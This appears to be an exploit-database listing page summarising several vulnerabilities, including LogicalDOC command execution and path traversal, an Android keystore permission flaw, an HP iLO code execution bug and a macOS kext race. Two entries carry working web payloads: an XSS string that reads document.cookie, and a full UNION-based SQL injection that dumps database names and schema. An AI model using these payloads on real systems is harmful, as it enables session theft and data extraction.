
Explore Vulnerabilities

Explore all Exploits:

LogicalDOC Enterprise 7.7.4 Post-Auth Command Execution Via Binary Path Manipulation

LogicalDOC suffers from multiple authenticated OS command execution vulnerabilities: the paths of the many binaries bundled with the package can be manipulated, together with their respective arguments, when changing the settings. This can be exploited to perform a local root privilege escalation attack and/or to inject and execute arbitrary system commands as the root or SYSTEM user, depending on the affected platform.

LogicalDOC Enterprise 7.7.4 Multiple Directory Traversal Vulnerabilities

The application suffers from multiple post-auth file disclosure vulnerabilities because input passed through the 'suffix' and 'fileVersion' parameters is not properly verified before being used to include files. This can be exploited to read arbitrary files from local resources via directory traversal.

Multi Language Olx Clone Script – Stored XSS

A stored XSS vulnerability exists in the Multi Language Olx Clone Script, which allows an attacker to inject malicious JavaScript code into the application. The injected code is executed whenever a user visits the vulnerable page. The attack vector is a comment, and the payload is <svg/onload=alert(document.cookie)>. To exploit the vulnerability, an attacker must first register and log in to the application, then open any listing and leave a comment containing the payload. The code then executes each time the page is visited.

Naukri Clone Script 3.0.3 – ‘indus’ SQL Injection

The vulnerability allows an attacker to inject SQL commands.

Proof of Concept: http://localhost/jobsite-advanced/searchresult.php?searchindus&indus=[SQL]
Parameter: indus (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 51 columns
Payload: UNION SELECT NULL,NULL,NULL,/*!00000Concat(0x3C62723E,version(),0x3C62723E,user(),0x3C62723E,database())*/,NULL,NULL,NULL,/*!00000group_coNcat(0x3C62723E,table_name,0x3a,column_name)*/,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/*!00000from*/ information_schema.columns where table_schema=database()%23

AppleEmbeddedOSSupportHost.kext Privilege Escalation Vulnerability

AppleEmbeddedOSSupportHost.kext is presumably involved in communication with the OS running on the Touch Bar of newer MacBook Pro models. The IOUserClient superclass does not implement any locking for registerNotificationPort; it is up to the user client itself to correctly prevent dangerous concurrent accesses. By calling registerNotificationPort from two threads in parallel, an AppleEmbeddedOSSupportHostClient can be made to drop two references on a port when it only holds one. Note that AppleEmbeddedOSSupportHostClient is only reachable by root, so this is a root -> kernel privilege escalation.

Remote Code Execution Vulnerability in HP iLO

A vulnerability in HP iLO 4 firmware version 2.53 and prior allows an attacker to execute arbitrary code on the target system. The vulnerability is due to improper validation of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the targeted system. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.

Herospeed TelnetSwitch pwn

The Herospeed TelnetSwitch daemon listens on TCP/787 and exists to allow enabling telnetd. A small stack overflow allows an attacker to overwrite the dynamically generated password and enable telnetd.

Keystore Binder Service Vulnerability

The keystore binder service (android.security.IKeystoreService) allows users to issue several commands related to key management, including adding, removing, exporting and generating cryptographic keys. The service is accessible from many SELinux contexts, including application contexts but also unprivileged daemons such as 'media.codec'. Binder calls to this service are unpacked by IKeyStoreService and then passed on to be processed by KeyStoreService. The 'generateKey' command is handled by 'KeyStoreService::generateKey'. This method uses 'KeyStoreService::checkBinderPermission' to validate the calling process's permissions; however, that check does not properly validate the caller's permissions, allowing an unprivileged process to gain access to privileged operations.
